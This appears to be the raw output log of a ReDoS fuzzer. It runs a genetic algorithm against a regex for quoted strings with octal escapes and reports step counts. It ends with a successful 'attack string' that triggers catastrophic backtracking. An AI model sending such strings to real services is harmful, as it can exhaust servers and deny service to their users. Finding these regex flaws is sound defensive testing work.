("|'|`)[^\\]*(\\+-?[0-7]{1,3}(?![0-9]))(?:.|\n|\t|\u2028|\u2029)*(?:\1)
6: <14 : 10.0 : "|'|`><18 : 16.0 : "|'|`\\><33 : 18.77777777777778 : "|'|`\\1><34 : 19.5 : "|'|`\\17><35 : 25.615384615384617 : "|'|`\\1?:\1><35 : 5.857142857142857 : "|'|`\\1?:\1">
===Initiate End===
Node Coverage: 38/38
find attack string when mutate
===Genetic Algorithm End===
Node Coverage: 38/38
Vulnerable: ``|'|'|"""|'|'"""""|'|'""|'`\\1?
#Na\V/v  	 	
	
 
	F+7L{.&jufoizikyouwpewzqaaofjrqlkvppeqIQDGAW:\1	ijpfsnpqxjwhgbhtuizdyj
100478 : 823.5901639344262 : ``|'|'|"""|'|'"""""|'|'""|'`\\1?
#Na\V/v  	 	
	
 
	F+7L{.&jufoizikyouwpewzqaaofjrqlkvppeqIQDGAW:\1	ijpfsnpqxjwhgbhtuizdyj
100012 : 1370.027397260274 : ``|'|'|"""|'|'"""""|'|'""|'`\\1?
#Na\V/v  	 	
	
 
	F+7L{.&jufoizikyouwpe
1000187 : ``|'|'|"""|'|'"""""|'|'""|'`\\1?
#Na\V/v  	 	
	
 
	 	 	
	
 
	F+7L{.&jufoizikyouwpe
1000534 : 4 : ``|'|'|"""|'|'"""""|'|'""|'`\\1?
#Na\V/v  	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	F+7L{.&jufoizikyouwpe
100000447 : ``|'|'|"""|'|'"""""|'|'""|'`\\1?
#Na\V/v  	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	F+7L{.&jufoizikyouwpe
TIME: 8.742224672 (s)
Attack success, attack string is:
``|'|'|"""|'|'"""""|'|'""|'`\\1?
#Na\V/v  	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	 	 	
	
 
	F+7L{.&jufoizikyouwpe
